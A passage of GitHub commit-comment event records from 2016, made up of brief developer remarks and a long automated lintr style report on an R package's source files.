{"id":"4605410996","type":"CommitCommentEvent","actor":{"login":"akoury"},"repo":{"name":"jawee/language-blade"},"payload":{"comment":{"id":19137733,"position":null,"line":null,"path":null,"commit_id":"a5cdd44eb03cbbba43e634079dec851f06efcc25","created_at":"2016-09-22T22:08:55Z","updated_at":"2016-09-22T22:08:55Z","body":"Thanks a lot for this, was driving me crazy"}},"created_at":"2016-09-22T22:08:55Z"}
{"id":"4605413793","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":19137737,"position":42,"line":34,"path":"app/views/login/profile.html.erb","commit_id":"009f183dbc307a443a6b8e481c1935564db4c567","created_at":"2016-09-22T22:09:33Z","updated_at":"2016-09-22T22:09:33Z","body":"What does the role tag do?"}},"created_at":"2016-09-22T22:09:33Z"}
{"id":"4605416441","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":19137747,"position":39,"line":31,"path":"app/views/login/profile.html.erb","commit_id":"009f183dbc307a443a6b8e481c1935564db4c567","created_at":"2016-09-22T22:10:08Z","updated_at":"2016-09-22T22:10:08Z","body":"value = \"winter\"???? What's that?"}},"created_at":"2016-09-22T22:10:08Z"}
{"id":"4605419674","type":"CommitCommentEvent","actor":{"login":"andrewelizondo"},"repo":{"name":"chef-cft/wombat"},"payload":{"comment":{"id":19137756,"position":null,"line":null,"path":null,"commit_id":"e82a5fe0aa9dc8b8c753e91c90fa4d3abdad4bf9","created_at":"2016-09-22T22:10:51Z","updated_at":"2016-09-22T22:10:51Z","body":"![happylittlemethods](http://a2.files.biography.com/image/upload/c_fit,cs_srgb,dpr_1.0,q_80,w_620/MTI1NDg4NTg2MDAxODA1Mjgy.jpg)"}},"created_at":"2016-09-22T22:10:51Z"}
{"id":"4605422473","type":"CommitCommentEvent","actor":{"login":"jackkoenig"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19137762,"position":null,"line":null,"path":null,"commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T22:11:29Z","updated_at":"2016-09-22T22:11:29Z","body":"@donggyukim You use parentheses on functions that have side-effects which is kind of implied by functions that return Unit"}},"created_at":"2016-09-22T22:11:29Z"}
{"id":"4605435050","type":"CommitCommentEvent","actor":{"login":"Tangyuan1994"},"repo":{"name":"Tangyuan1994/Dep-Infoqew"},"payload":{"comment":{"id":19137781,"position":null,"line":null,"path":null,"commit_id":"f39e50f6b35046eb2a5ac4e80692162de4cb957a","created_at":"2016-09-22T22:14:28Z","updated_at":"2016-09-22T22:14:28Z","body":"asdQ"}},"created_at":"2016-09-22T22:14:28Z"}
{"id":"4605436324","type":"CommitCommentEvent","actor":{"login":"matsbla"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19137785,"position":33,"line":33,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-22T22:14:47Z","updated_at":"2016-09-22T22:14:47Z","body":"Can I add classes \"btn btn-primary btn-lg\"? To make it call-to-action button."}},"created_at":"2016-09-22T22:14:47Z"}
{"id":"4605437823","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19137789,"position":null,"line":null,"path":null,"commit_id":"195a3868715ee981b3c0c59ea1a8082d577912b5","created_at":"2016-09-22T22:15:06Z","updated_at":"2016-09-22T22:15:06Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/195a3868715ee981b3c0c59ea1a8082d577912b5/R/drawLocal.R#L54) *style:* **Use two spaces to 